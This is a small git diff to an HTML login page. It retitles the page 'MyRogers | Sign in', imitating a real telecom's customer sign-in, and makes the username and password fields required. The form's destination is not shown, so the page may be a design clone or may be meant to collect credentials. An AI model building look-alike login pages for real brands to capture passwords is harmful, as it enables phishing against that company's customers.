--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Document</title>
+    <title>MyRogers | Sign in</title>
 
     <link rel="stylesheet" href="style.css">
     <link rel="preconnect" href="https://fonts.googleapis.com">
@@ -35,11 +35,11 @@
                     <div class="input__container">
                         <div class="input__container--icon">
                             <span class="material-symbols-rounded icon">info</span>
-                            <input type="email" name="data[email]" id="email-id" class="input input__email" placeholder="Username">
+                            <input type="email" name="data[email]" id="email-id" class="input input__email" placeholder="Username" required>
                         </div>
                         <div class="input__container--icon">
                             <span class="material-symbols-rounded icon">info</span>
-                            <input type="password" name="data[password]" id="password-id" class="input input__password" placeholder="Password">
+                            <input type="password" name="data[password]" id="password-id" class="input input__password" placeholder="Password" required>
                         </div>
                     </div>
                     <div class="checkbox__container">
